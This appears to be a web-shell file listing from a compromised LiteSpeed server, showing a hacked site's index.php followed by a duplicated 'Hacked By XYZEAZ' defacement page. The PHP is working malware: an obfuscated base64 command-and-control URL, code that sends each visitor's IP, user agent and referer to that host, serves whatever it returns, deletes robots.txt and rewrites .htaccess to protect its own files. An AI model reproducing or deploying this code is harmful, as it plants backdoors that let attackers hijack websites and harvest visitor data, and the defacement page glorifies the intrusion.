HEX
Server: LiteSpeed
System: Linux venus 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User: axxoncom (1007)
PHP: 8.3.19
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/axxoncom/domains/omnific7.com/private_html/index.php
<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYyNzEtY2g0LXYzMDAucmFrdXRlbjEwanAuY2xpY2s='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<html><head>
    <title>Hacked By XYZEAZ</title>
    <link rel="icon" type="image/x-icon" href="https://l.top4top.io/p_3182qs9x01.jpg">
    <meta name="description" content="Hacked by XYZEAZ">
    <meta name="keywords" content="Hacked By XYZEAZ , XYZ , Cyber Attack , Security Breach">
    <meta name="author" content="Hacked by XYZEAZ">
    <meta name="title" content="Hacked By XYZEAZ">
    <meta name="googlebot" content="index,follow,XYZEAZ,XYZ">
    <meta name="robots" content="all">
    <meta name="robots schedule" content="auto">
    <meta name="distribution" content="global">
    <meta contact="#">
    <meta charset="utf-8">
    <style>
        html, body {
            color: #FFFFFF;
            font-family: 'XYZ the Great', sans-serif;
            font-weight: 100;
            height: 100vh;
            margin: 0;
        }
        code {
            font-family: 'Times New Roman', Times, serif !important;
            font-weight: bold !important;
            font-size: 17px;
        }
        .main-title {
            font-size: 24px !important;
        }
        .full-height {
            height: 100vh; 
        } 
        .flex-center {
            align-items: center;
            display: flex;
            justify-content: center;
        }
        .position-ref { 
            position: relative; 
        }
        .content {
            text-align: center;
        }
        .title {
            font-size: 36px;
            padding: 20px;
        }
        .circular-image {
            width: 250px;   
            height: 250px; 
            border-radius: 100%;  
            object-fit: cover;  
        }
    </style>
</head>
<body align="center" oncontextmenu="return false" bgcolor="ffffff">
    <div class="stars">
        <div class="twinkling">
            <div class="flex-center position-ref full-height">
                <div class="content">                                                                                                                  
                    <div class="text">
                        <font color="#00000">
                           <img src="https://l.top4top.io/p_3182qs9x01.jpg" align="center" style="width:320px; height:320px;">
                            <br><br>
                            <b><i>
                                <code class="main-title"> Hacked By<font color="red"> XYZEAZ<img src="https://i.imgur.com/Imsbaxc.gif" width="19" height="19"></font>   
                                </code>
                                <br><br>
                                <code>Ops! Admin , Your Site Got Hacked</code>
                                <br>
                                <code>You should be looking for better security</code>
                                <br>
                                <code>Forbidden = <font color="red"> Passed</font> - SafeMod = <font color="red">OFF</font> - Security = <font color="red">Active</font></code>
                                <br>
                                <code>Just Keep Your Head Down</code>
                                <br>
                                <font size="4">Greetz:</font>
                                <br>
                                <code>- XYZ ~ D4RK D3MON ~ CuteXploit ~ Err0r_HB  ~ AGAND842 ~ Zasnit ~ BloodShade -</code>
                            </i></b></font>
                        </div>
                        <code><font color="#00000"><b><i>
                            <a href="https://t.me/XYZEAZ" target="_blank">
                                <img src="https://cdn.icon-icons.com/icons2/2389/PNG/512/telegram_logo_icon_144811.png" alt="Telegram Logo" width="25" height="25">
                            </a>
                            <br><code>XYZ - Cyber Alpha Wolf</code>
                            <br><code>© All Rights Reserved</code>
                            <iframe width="0%" height="0" src="https://b.top4top.io/m_31820kxsu1.mp3" loop="1" allow="autoplay; encrypted-media" allowfullscreen=""></iframe>
                        </i></b></font></code>
                    </div>
                </div>
            </div>
        </div>
    


</body></html>

<html><head>
    <title>Hacked By XYZEAZ</title>
    <link rel="icon" type="image/x-icon" href="https://l.top4top.io/p_3182qs9x01.jpg">
    <meta name="description" content="Hacked by XYZEAZ">
    <meta name="keywords" content="Hacked By XYZEAZ , XYZ , Cyber Attack , Security Breach">
    <meta name="author" content="Hacked by XYZEAZ">
    <meta name="title" content="Hacked By XYZEAZ">
    <meta name="googlebot" content="index,follow,XYZEAZ,XYZ">
    <meta name="robots" content="all">
    <meta name="robots schedule" content="auto">
    <meta name="distribution" content="global">
    <meta contact="#">
    <meta charset="utf-8">
    <style>
        html, body {
            color: #FFFFFF;
            font-family: 'XYZ the Great', sans-serif;
            font-weight: 100;
            height: 100vh;
            margin: 0;
        }
        code {
            font-family: 'Times New Roman', Times, serif !important;
            font-weight: bold !important;
            font-size: 17px;
        }
        .main-title {
            font-size: 24px !important;
        }
        .full-height {
            height: 100vh; 
        } 
        .flex-center {
            align-items: center;
            display: flex;
            justify-content: center;
        }
        .position-ref { 
            position: relative; 
        }
        .content {
            text-align: center;
        }
        .title {
            font-size: 36px;
            padding: 20px;
        }
        .circular-image {
            width: 250px;   
            height: 250px; 
            border-radius: 100%;  
            object-fit: cover;  
        }
    </style>
</head>
<body align="center" oncontextmenu="return false" bgcolor="ffffff">
    <div class="stars">
        <div class="twinkling">
            <div class="flex-center position-ref full-height">
                <div class="content">                                                                                                                  
                    <div class="text">
                        <font color="#00000">
                           <img src="https://l.top4top.io/p_3182qs9x01.jpg" align="center" style="width:320px; height:320px;">
                            <br><br>
                            <b><i>
                                <code class="main-title"> Hacked By<font color="red"> XYZEAZ<img src="https://i.imgur.com/Imsbaxc.gif" width="19" height="19"></font>   
                                </code>
                                <br><br>
                                <code>Ops! Admin , Your Site Got Hacked</code>
                                <br>
                                <code>You should be looking for better security</code>
                                <br>
                                <code>Forbidden = <font color="red"> Passed</font> - SafeMod = <font color="red">OFF</font> - Security = <font color="red">Active</font></code>
                                <br>
                                <code>Just Keep Your Head Down</code>
                                <br>
                                <font size="4">Greetz:</font>
                                <br>
                                <code>- XYZ ~ D4RK D3MON ~ CuteXploit ~ Err0r_HB  ~ AGAND842 ~ Zasnit ~ BloodShade -</code>
                            </i></b></font>
                        </div>
                        <code><font color="#00000"><b><i>
                            <a href="https://t.me/XYZEAZ" target="_blank">
                                <img src="https://cdn.icon-icons.com/icons2/2389/PNG/512/telegram_logo_icon_144811.png" alt="Telegram Logo" width="25" height="25">
                            </a>
                            <br><code>XYZ - Cyber Alpha Wolf</code>
                            <br><code>© All Rights Reserved</code>
                            <iframe width="0%" height="0" src="https://b.top4top.io/m_31820kxsu1.mp3" loop="1" allow="autoplay; encrypted-media" allowfullscreen=""></iframe>
                        </i></b></font></code>
                    </div>
                </div>
            </div>
        </div>
    


</body></html>